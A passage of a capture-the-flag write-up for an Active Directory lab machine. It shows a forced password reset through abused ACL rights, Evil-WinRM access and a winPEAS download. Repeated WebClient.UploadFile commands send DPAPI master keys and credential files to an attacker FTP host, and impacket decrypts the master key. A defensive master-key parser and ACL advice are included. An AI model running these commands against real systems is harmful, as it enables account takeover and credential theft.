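The admin allow-list is deliberately small; in practice it would be the service accounts and tier-0 admins that legitimately manage groups, and anything else touching a group is worth a ticket. The mitigation for the first alert is the ACL itself: an HR group holding GenericWrite over a developers group is the misconfiguration BloodHound surfaced, and removing that ACE closes the path.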


┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# vim pwdlastsetChagne.py

┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# python3 pwdlastsetChagne.py

┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# cat pwdlastsetChagne.py
import ldap3

# Bind as ant.edwards (who has full control over adam.silver) over plain LDAP on 389
server = ldap3.Server('10.10.11.70', port=389, use_ssl=False)
connection = ldap3.Connection(server, 'CN=ANTHONY J. EDWARDS,DC=PUPPY,DC=HTB', 'Antman2025!', auto_bind=True)
print(connection.extend.standard.who_am_i())   # confirm which identity the bind produced
# Replace pwdLastSet with 0: the account is flagged "must change password at next logon"
connection.modify('CN=ADAM D. SILVER,CN=USERS,DC=PUPPY,DC=HTB', {'pwdLastSet': [(ldap3.MODIFY_REPLACE, ['0'])]})
print(connection.result)   # 'description' should read 'success'
connection.unbind()

Then try the password change again:

┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 set password adam.silver Adam@2025!
Traceback (most recent call last):
File "/root/.local/bin/bloodyAD", line 8, in <module>
sys.exit(main())
~~~~^^
File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/main.py", line 210, in main
output = args.func(conn, **params)
File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/cli_modules/set.py", line 273, in password
raise e
File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/cli_modules/set.py", line 118, in password
conn.ldap.bloodymodify(target, {"unicodePwd": op_list})
~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/network/ldap.py", line 315, in bloodymodify
raise err
msldap.commons.exceptions.LDAPModifyException: Password can't be changed. It may be because the oldpass provided is not valid.
You can try to use another password change protocol such as smbpasswd, server error may be more explicit.

Still fails.

[screenshot]

Not sure why there is no permission; it only works when the old password is supplied.

┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# rpcclient -U 'puppy.htb\Ant.Edwards%Antman2025!' 10.10.11.70
rpcclient $> setuserinfo ADAM.SILVER 23 Password@987
rpcclient $>

Switching methods worked right away.

WinRM remote login

┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# bloodyAD --host dc.puppy.htb -d puppy.htb -u ant.edwards -p Antman2025! remove uac 'ADAM.SILVER' -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from ADAM.SILVER's userAccountControl

┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# evil-winrm -i dc.puppy.htb -u adam.silver -p Password@987

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adam.silver\Documents>
*Evil-WinRM* PS C:\Users\adam.silver\Documents> cd ..
*Evil-WinRM* PS C:\Users\adam.silver> dir


Directory: C:\Users\adam.silver


Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 2/28/2025 12:31 PM 3D Objects
d-r--- 2/28/2025 12:31 PM Contacts
d-r--- 3/12/2025 12:09 PM Desktop
d-r--- 3/5/2025 10:16 AM Documents
d-r--- 2/28/2025 12:31 PM Downloads
d-r--- 2/28/2025 12:31 PM Favorites
d-r--- 2/28/2025 12:31 PM Links
d-r--- 2/28/2025 12:31 PM Music
d-r--- 2/28/2025 12:31 PM Pictures
d-r--- 2/28/2025 12:31 PM Saved Games
d-r--- 2/28/2025 12:31 PM Searches
d-r--- 2/28/2025 12:31 PM Videos


*Evil-WinRM* PS C:\Users\adam.silver> cd Desktop
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> dir


Directory: C:\Users\adam.silver\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2025 12:31 PM 2312 Microsoft Edge.lnk
-ar--- 7/25/2025 7:11 AM 34 user.txt


*Evil-WinRM* PS C:\Users\adam.silver\Desktop> type user.txt
2d8************************

There is a Microsoft Edge browser shortcut.

Microsoft Edge stores saved passwords, cookies and other sensitive data encrypted in local files (for example `C:\Users\<username>\AppData\Local\Microsoft\Edge\User Data\Default\Login Data` and the `Cookies` file).

The data in those files is encrypted with DPAPI.

Upload winPEAS and run a scan.

*Evil-WinRM* PS C:\Users\adam.silver\Documents> (New-Object Net.WebClient).DownloadFile('http://10.10.14.41:8888/winPEASx64.exe','C:\Users\adam.silver\desktop\winPEASx64.exe')
*Evil-WinRM* PS C:\Users\adam.silver\Documents> cd C:\Users\adam.silver\desktop\
*Evil-WinRM* PS C:\Users\adam.silver\desktop> dir


Directory: C:\Users\adam.silver\desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2025 12:31 PM 2312 Microsoft Edge.lnk
-ar--- 7/25/2025 7:11 AM 34 user.txt
-a---- 7/25/2025 9:21 AM 441344 winPEASx64.exe

*Evil-WinRM* PS C:\Users\adam.silver\desktop> ./winPEASx64.exe
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Creating Dynamic lists, this could take a while, please wait...
- Checking if domain...
- Getting Win32_UserAccount info...
Error while getting Win32_UserAccount info: System.Management.ManagementException: Access denied
at System.Management.ThreadDispatch.Start()
at System.Management.ManagementScope.Initialize()
at System.Management.ManagementObjectSearcher.Initialize()
at System.Management.ManagementObjectSearcher.Get()
at b9.by()
- Creating current user groups list...
- Creating active users list...
[X] Exception: System.NullReferenceException: Object reference not set to an instance of an object.
at cc.a(Boolean A_0, Boolean A_1, Boolean A_2, Boolean A_3, Boolean A_4)
- Creating disabled users list...
[X] Exception: System.NullReferenceException: Object reference not set to an instance of an object.
at cc.a(Boolean A_0, Boolean A_1, Boolean A_2, Boolean A_3, Boolean A_4)
- Admin users list...
[X] Exception: System.NullReferenceException: Object reference not set to an instance of an object.
at cc.a(Boolean A_0, Boolean A_1, Boolean A_2, Boolean A_3, Boolean A_4)

…..

╔══════════╣ Searching hidden files or folders in C:\Users home (can be slow)

C:\Users\adam.silver\Desktop\DFBE70A7E5CC19A398EBF1B96859CE5D
C:\Users\Default User
C:\Users\Default
C:\Users\All Users
C:\Users\Default
C:\Users\All Users
C:\Users\All Users\ntuser.pol

[screenshot]

DPAPI leak: cracking the master key

A hidden file, C:\Users\adam.silver\Desktop\DFBE70A7E5CC19A398EBF1B96859CE5D, was found.

Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\adam.silver\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105
Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Local\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105


*Evil-WinRM* PS C:\Users\adam.silver\desktop> Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Roaming\Microsoft\Credentials\
*Evil-WinRM* PS C:\Users\adam.silver\desktop> Get-ChildItem C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\


Directory: C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect


Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 2/28/2025 12:31 PM S-1-5-21-1487982659-1829050783-2281216199-1105


*Evil-WinRM* PS C:\Users\adam.silver\desktop> Get-ChildItem C:\Users\adam.silver\AppData\Local\Microsoft\Protect\
Cannot find path 'C:\Users\adam.silver\AppData\Local\Microsoft\Protect\' because it does not exist.
At line:1 char:1
+ Get-ChildItem C:\Users\adam.silver\AppData\Local\Microsoft\Protect\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\adam.s...rosoft\Protect\:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users\adam.silver\desktop> Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\



Directory: C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 2/28/2025 12:31 PM 24 CREDHIST
-a-hs- 2/28/2025 12:31 PM 76 SYNCHIST


*Evil-WinRM* PS C:\Users\adam.silver\desktop> Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105


Directory: C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 2/28/2025 12:31 PM 740 1038bdea-4935-41a8-a224-9b3720193c86
-a-hs- 2/28/2025 12:31 PM 896 BK-PUPPY
-a-hs- 2/28/2025 12:31 PM 24 Preferred


*Evil-WinRM* PS C:\Users\adam.silver\desktop>

Found the DPAPI master key file for user adam.silver.

*Evil-WinRM* PS C:\Users\adam.silver> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/1038bdea-4935-41a8-a224-9b3720193c86', 'C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105\1038bdea-4935-41a8-a224-9b3720193c86')

*Evil-WinRM* PS C:\Users\adam.silver\Documents> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/DFBE70A7E5CC19A398EBF1B96859CE5D-DESKTOP', 'C:\Users\adam.silver\Desktop\DFBE70A7E5CC19A398EBF1B96859CE5D')

*Evil-WinRM* PS C:\Users\adam.silver> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/BK-PUPPY', 'C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105\BK-PUPPY')

*Evil-WinRM* PS C:\Users\adam.silver> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/Preferred', 'C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105\Preferred')

*Evil-WinRM* PS C:\Users\adam.silver> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/DFBE70A7E5CC19A398EBF1B96859CE5D','C:\Users\adam.silver\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D')

*Evil-WinRM* PS C:\Users\adam.silver> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/CREDHIST', 'C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\CREDHIST')

*Evil-WinRM* PS C:\Users\adam.silver> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/SYNCHIST', 'C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\SYNCHIST')

*Evil-WinRM* PS C:\Users\adam.silver>

After copying them down, decrypt the DPAPI data:

┌──(root㉿kali)-[/srv/ftp/incoming]
└─# impacket-dpapi masterkey -t puppy.htb/adam.silver:'Password@987'@10.10.11.70 -file 1038bdea-4935-41a8-a224-9b3720193c86

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[MASTERKEYFILE]
Version : 2 (2)
Guid : 1038bdea-4935-41a8-a224-9b3720193c86
Flags : 0 (0)
Policy : 0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key using rpc call
Decrypted key: 0x67c93a5831a5d17bae13deb6ef3324f5c97abd363d8f146f5ac79f07fb2b2c0eb21433fcf211c15af4e79c1c72a512d3c8f181433b1fa50e78e7e146c27230ae

With adam.silver's plaintext DPAPI master key obtained, next decrypt the DPAPI file found on the Desktop and the encrypted CREDHIST file:
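The impacket output above shows the fixed header of a DPAPI master key file (the GUID, two DWORDs impacket reports as Flags and Policy, and the lengths of the master, backup, CredHist and domain-key blobs). The parser below is an added example, not code from the write-up or from impacket: it reads that header and the per-blob headers and reports which recovery paths the file admits, without decrypting anything. The layout constants follow the structure impacket uses; the file it parses by default is constructed in build_sample() with the blob lengths from the output above (136/104/0/372), and the 8000-round/SHA-512/AES-256 values, salts and backup-key GUID are dummies. The point for a defender: a domain-key blob means the DC's backup key can recover the master key for anyone who can authenticate as the user (that is what "Decrypted key using rpc call" means), so the user's password is the whole boundary around everything DPAPI protects for them.

```python
import struct
import uuid

# Fixed 128-byte header of a DPAPI master key file (same layout impacket's dpapi.py uses):
# version, 2 reserved DWORDs, GUID as 36 UTF-16LE chars, 2 DWORDs impacket reports as Flags,
# a Policy DWORD, then the byte lengths of the four blobs that follow the header, in this order.
HEADER = struct.Struct("<III72sIIIQQQQ")
KEY_BLOB = struct.Struct("<I16sIII")       # master/backup key blob: version, salt, PBKDF2 rounds, hash alg, cipher alg
DOMAIN_BLOB = struct.Struct("<III16s")     # domain key blob: version, secret len, access-check len, backup-key GUID
CALG = {0x800E: "SHA-512", 0x8009: "HMAC", 0x6610: "AES-256", 0x6603: "3DES"}


def parse_masterkey_file(data):
    """Split a master key file into its blobs and decode the per-blob headers (no decryption)."""
    (version, _, _, guid_raw, _, _, policy,
     mk_len, bk_len, ch_len, dk_len) = HEADER.unpack_from(data, 0)
    pos, blobs = HEADER.size, {}
    for name, length in (("master", mk_len), ("backup", bk_len), ("credhist", ch_len), ("domain", dk_len)):
        blobs[name] = data[pos:pos + length]
        pos += length
    if pos != len(data):
        raise ValueError("blob lengths do not add up to the file size")
    info = {"version": version, "guid": guid_raw.decode("utf-16le"), "policy": policy,
            "lengths": (mk_len, bk_len, ch_len, dk_len),
            "master_key": None, "backup_key": None, "domain_key": None}
    for name in ("master", "backup"):
        blob = blobs[name]
        if blob:
            v, salt, rounds, hash_alg, cipher_alg = KEY_BLOB.unpack_from(blob, 0)
            info[name + "_key"] = {"version": v, "salt": salt.hex(), "rounds": rounds,
                                   "hash": CALG.get(hash_alg, hex(hash_alg)),
                                   "cipher": CALG.get(cipher_alg, hex(cipher_alg)),
                                   "encrypted_len": len(blob) - KEY_BLOB.size}
    if blobs["domain"]:
        v, secret_len, check_len, bk_guid = DOMAIN_BLOB.unpack_from(blobs["domain"], 0)
        info["domain_key"] = {"version": v, "secret_len": secret_len, "access_check_len": check_len,
                              "backup_key_guid": str(uuid.UUID(bytes_le=bk_guid))}
    return info


def recovery_paths(info):
    """Which ways exist to recover the plaintext master key, judged from the blobs present."""
    paths = []
    if info["master_key"]:
        paths.append("user password (or a hash derived from it) + user SID: offline PBKDF2 guessing")
    if info["domain_key"]:
        paths.append("domain backup key: the DC decrypts it for any caller who can authenticate as the user, "
                     "or offline with the DC's exported backup key")
    return paths


def build_sample():
    """Constructed file with the blob lengths seen in the impacket output above (136/104/0/372);
    keys, salts, rounds and the backup-key GUID are dummy values."""
    guid = "1038bdea-4935-41a8-a224-9b3720193c86"
    master = KEY_BLOB.pack(2, b"\x11" * 16, 8000, 0x800E, 0x6610) + b"\xAA" * 104   # 32 + 104 = 136
    backup = KEY_BLOB.pack(2, b"\x22" * 16, 8000, 0x800E, 0x6610) + b"\xBB" * 72    # 32 + 72 = 104
    bk_guid = uuid.UUID("00000000-0000-0000-0000-00000000cafe").bytes_le
    domain = DOMAIN_BLOB.pack(2, 256, 88, bk_guid) + b"\xCC" * 256 + b"\xDD" * 88   # 28 + 256 + 88 = 372
    header = HEADER.pack(2, 0, 0, guid.encode("utf-16le"), 0, 0, 0,
                         len(master), len(backup), 0, len(domain))
    return header + master + backup + domain


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    info = parse_masterkey_file(data)
    print(f"GUID {info['guid']}  blobs {info['lengths']}  master-key KDF {info['master_key']}")
    for p in recovery_paths(info):
        print(" -", p)
```

Pass a real master key file path to inspect it. The CredHist length of 0 in the output above also matters: with no CredHist chain, there are no older password-derived keys to try, so the current password (or the DC) is the only way in.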

┌──(root㉿kali)-[/srv/ftp/incoming]
└─# impacket-dpapi credential -file DFBE70A7E5CC19A398EBF1B96859CE5D-DESKTOP -key '0x67c93a5831a5d17bae13deb6ef3324f5c97abd363d8f146f5ac79f07fb2b2c0eb21433fcf211c15af4e79c1c72a512d3c8f181433b1fa50e78e7e146c27230ae'


Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[CREDENTIAL]
LastWritten : 2025-02-28 20:31:23
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000002 (CRED_PERSIST_LOCAL_MACHINE)
Type : 0x00000001 (CRED_TYPE_GENERIC)
Target : WindowsLive:target=virtualapp/didlogical
Description : PersistedCredential
Unknown :
Username : 02pjquuelmoskags
Unknown :

KeyWord : Microsoft_WindowsLive:authstate:0
Data :
0000 01 00 00 00 D0 8C 9D DF 01 15 D1 11 8C 7A 00 C0 .............z..
0010 4F C2 97 EB 01 00 00 00 B6 88 C3 E7 CB 39 31 48 O............91H
0020 B2 D8 A2 43 4E 14 C2 F4 00 00 00 00 02 00 00 00 ...CN...........
0030 00 00 10 66 00 00 00 01 00 00 20 00 00 00 AD 11 ...f...... .....
0040 01 2D 5F 16 26 ED 21 21 B2 5B 69 94 4F 4C 18 98 .-_.&.!!.[i.OL..
0050 A4 8F B8 2C 6F 04 A3 E9 B7 16 FE C3 24 06 00 00 ...,o.......$...
0060 00 00 0E 80 00 00 00 02 00 00 20 00 00 00 A6 BE .......... .....
0070 8A 4F D7 AE 5B 64 61 F1 6E A4 34 59 E5 6E D8 91 .O..[da.n.4Y.n..
0080 9D 61 5D C8 AA 44 B5 34 95 CF 1C BE 93 B2 90 1E .a]..D.4........
0090 00 00 8E 0A 17 56 03 8B 3E A2 60 68 B2 3B 30 B9 .....V..>.`h.;0.
00a0 9E F0 18 5A 0A FC 60 85 24 03 C6 BA F0 54 94 AC ...Z..`.$....T..
00b0 F5 93 29 47 15 4B 12 07 27 C4 C8 1C D0 D1 6A 3A ..)G.K..'.....j:
00c0 3C F8 D1 43 58 ED C2 DB 3A 17 07 95 A0 A0 30 89 <..CX...:.....0.
00d0 44 F0 BF 74 A2 27 11 EF E3 20 3E B0 2E 4D 6F 74 D..t.'... >..Mot
00e0 FC 17 26 20 FD 80 3C 01 AD 5A A7 E9 C0 E0 9F C1 ..& ..<..Z......
00f0 D3 63 4E 36 B0 75 25 6C 8D ED 98 AD 5F 9C C7 D8 .cN6.u%l...._...
KeyWord : Microsoft_WindowsLive:authstate:1
Data :
0000 DF EE D6 87 77 32 4D EC 8A 4A 56 65 55 23 14 C2 ....w2M..JVeU#..
0010 C8 2F 4F 7D 35 27 61 B3 03 60 65 AD 0A 99 E9 37 ./O}5'a..`e....7
0020 E5 5C 04 B2 FC 72 1F B0 6F 8F E8 8B A2 D6 53 06 .\...r..o.....S.
0030 2E 05 21 D2 9C 2F CE 47 E8 34 55 B7 54 19 53 0A ..!../.G.4U.T.S.
0040 12 FE 39 1C BA 9E C4 48 55 6A B8 79 50 B6 B1 88 ..9....HUj.yP...
0050 24 B0 4F 42 2F B0 38 98 C1 B0 6F FC 7F C0 86 FD $.OB/.8...o.....
0060 49 45 8C 04 7E DB 74 62 4C 3F EC 81 3D 39 A7 C3 IE..~.tbL?..=9..
0070 D7 08 7E 7E 17 AD CE 81 9C AA BE 29 5A 8F AC 8A ..~~.......)Z...
.........

┌──(root㉿kali)-[/srv/ftp/incoming]
└─# impacket-dpapi credential -file DFBE70A7E5CC19A398EBF1B96859CE5D -key '0x67c93a5831a5d17bae13deb6ef3324f5c97abd363d8f146f5ac79f07fb2b2c0eb21433fcf211c15af4e79c1c72a512d3c8f181433b1fa50e78e7e146c27230ae'


Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[CREDENTIAL]
LastWritten : 2025-03-08 15:26:44
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000002 (CRED_PERSIST_LOCAL_MACHINE)
Type : 0x00000001 (CRED_TYPE_GENERIC)
Target : WindowsLive:target=virtualapp/didlogical
Description : PersistedCredential
Unknown :
Username : 02pjquuelmoskags
Unknown :

KeyWord : Microsoft_WindowsLive:authstate:0
Data :
0000 01 00 00 00 D0 8C 9D DF 01 15 D1 11 8C 7A 00 C0 .............z..
0010 4F C2 97 EB 01 00 00 00 B6 88 C3 E7 CB 39 31 48 O............91H
0020 B2 D8 A2 43 4E 14 C2 F4 00 00 00 00 02 00 00 00 ...CN...........
0030 00 00 10 66 00 00 00 01 00 00 20 00 00 00 2A 4C ...f...... ...*L
0040 BC 96 1D 48 07 9A 8C BF 2D CF DB E4 10 68 AD 6A ...H....-....h.j
0050 65 85 D5 C8 77 36 31 D2 40 76 A0 7A 5D 94 00 00 e...w61.@v.z]...
0060 00 00 0E 80 00 00 00 02 00 00 20 00 00 00 E3 8A .......... .....
0070 64 01 07 DE BC 90 3A E9 1D FB 4E D7 F8 01 5F 0F d.....:...N..._.
0080 F4 59 E9 B5 1C 9B E3 F3 58 8F 45 AA B8 C6 90 1E .Y......X.E.....
0090 00 00 16 87 3F 65 7E 4E 13 D2 70 80 38 46 BE B6 ....?e~N..p.8F..
00a0 93 16 01 78 FA 73 3C C7 D8 BC FE D0 7A 34 A6 0A ...x.s<.....z4..
00b0 9D 7F F7 A1 8B 39 A1 B8 C3 91 97 2F 6B 2F D9 A3 .....9...../k/..
00c0 1A C5 15 29 9F 4A CA 08 20 82 36 E4 BA A0 E5 CA ...).J.. .6.....
00d0 F8 09 0B 03 71 C1 F4 C0 1D B1 CF 47 97 02 C9 14 ....q......G....
00e0 D5 9B 7A 9A 95 13 66 B5 40 FB 85 B7 94 07 31 03 ..z...f.@.....1.
00f0 25 FD A5 C3 0A 3C 3C 7A EA 12 69 DD 57 44 59 7A %....<<z..i.WDYz
KeyWord : Microsoft_WindowsLive:authstate:1
Data :
0000 5B 57 12 1B 52 63 BD 78 A1 BB AC 5C 38 76 21 4D [W..Rc.x...\8v!M
0010 15 48 F0 7E 83 87 F7 3A C0 08 18 8C D3 2D 06 FE .H.~...:.....-..
0020 D1 96 D1 F6 6C 91 05 90 78 3A 68 5E 01 86 41 71 ....l...x:h^..Aq
0030 50 C0 45 75 A8 36 34 60 87 1F 63 80 A1 04 08 E0 P.Eu.64`..c.....
0040 E6 59 A8 44 C0 52 9A 14 25 E4 23 D0 8A B0 F9 19 .Y.D.R..%.#.....
0050 5F 99 11 4E 51 8F 23 9D A6 EB 09 05 4D 72 27 00 _..NQ.#.....Mr'.
0060 CC 7D 20 04 E5 6F 30 87 67 1F F1 41 DA D5 F7 39 .} ..o0.g..A...9
0070 03 81 74 6C 49 74 56 4E 71 F2 F9 09 21 F5 7F 13 ..tlItVNq...!...
0080 3A 06 1A E7 71 C0 54 6B F3 4A 7D 64 04 3D 42 DB :...q.Tk.J}d.=B.
0090 86 11 15 C6 D0 80 B5 41 38 C2 FD 06 61 D1 30 AC .......A8...a.0.
00a0 30 C6 D8 A8 6E C0 82 88 88 25 E0 E1 7B 52 25 B0 0...n....%..{R%.
00b0 2F 75 87 EC 64 46 03 9E 63 F6 CC 73 91 78 7A 7C /u..dF..c..s.xz|
00c0 E5 AB 76 A7 DE 68 A3 96 FA CF A8 FF 0A CF C1 9A ..v..h..........
00d0 D4 FA 91 A8 1D 10 87 E5 93 C2 8F 18 EB 1B 50 33 ..............P3
00e0 72 9B A5 6C 30 98 05 FF 28 8D 9C 6D F8 B4 CD 7B r..l0...(..m...{
00f0 16 F1 06 8C 85 3C C9 55 4B 8F 67 4D C9 D1 30 17 .....<.UK.gM..0.
.........

Still nothing useful here....

Information gathering

We keep browsing the directories.

image-20250726200752159

We find a backup file.

Copy it back and take a look.

*Evil-WinRM* PS C:\Users\adam.silver> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/site-backup-2024-12-30.zip', 'C:\backups\site-backup-2024-12-30.zip')
*Evil-WinRM* PS C:\Users\adam.silver> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/1.txt', 'C:\backups\1.txt')

image-20250726201618563

Inside are the credentials of the STEPH.COOPER@PUPPY.HTB user we analysed earlier.

DPAPI leak: cracking the masterkey

After logging in, enumerate DPAPI the same way as above.

Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107
Get-ChildItem C:\Users\steph.cooper\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Local\Microsoft\Protect\

*Evil-WinRM* PS C:\Users\steph.cooper\Documents> Get-ChildItem C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\


Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect


Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 2/23/2025 2:36 PM S-1-5-21-1487982659-1829050783-2281216199-1107


*Evil-WinRM* PS C:\Users\steph.cooper\Documents> Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107


Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:40 AM 740 556a2412-1275-4ccf-b721-e6a0b4f90407
-a-hs- 2/23/2025 2:36 PM 24 Preferred


*Evil-WinRM* PS C:\Users\steph.cooper\Documents> Get-ChildItem C:\Users\steph.cooper\AppData\Local\Microsoft\Protect\
Cannot find path 'C:\Users\steph.cooper\AppData\Local\Microsoft\Protect\' because it does not exist.
At line:1 char:1
+ Get-ChildItem C:\Users\steph.cooper\AppData\Local\Microsoft\Protect\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\steph....rosoft\Protect\:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\


Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:54 AM 414 C8D69EBE9A43E9DEBF6B5FBD48B521B9


*Evil-WinRM* PS C:\Users\steph.cooper\Documents> Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Local\Microsoft\Protect\
Cannot find path 'C:\Users\steph.cooper\AppData\Local\Microsoft\Protect\' because it does not exist.
At line:1 char:1
+ Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Local\Microsoft\P ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\steph....rosoft\Protect\:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users\steph.cooper\Documents>
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\


Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:40 AM 24 CREDHIST
-a-hs- 3/8/2025 7:40 AM 76 SYNCHIST


Clearly there is DPAPI material to decrypt here as well.

Copy the files back and decrypt them.

*Evil-WinRM* PS C:\Users\adam.silver> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/556a2412-1275-4ccf-b721-e6a0b4f90407', 'C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407')

*Evil-WinRM* PS C:\Users\adam.silver\Documents> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/C8D69EBE9A43E9DEBF6B5FBD48B521B9', 'C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9')

┌──(root㉿kali)-[/srv/ftp/incoming]
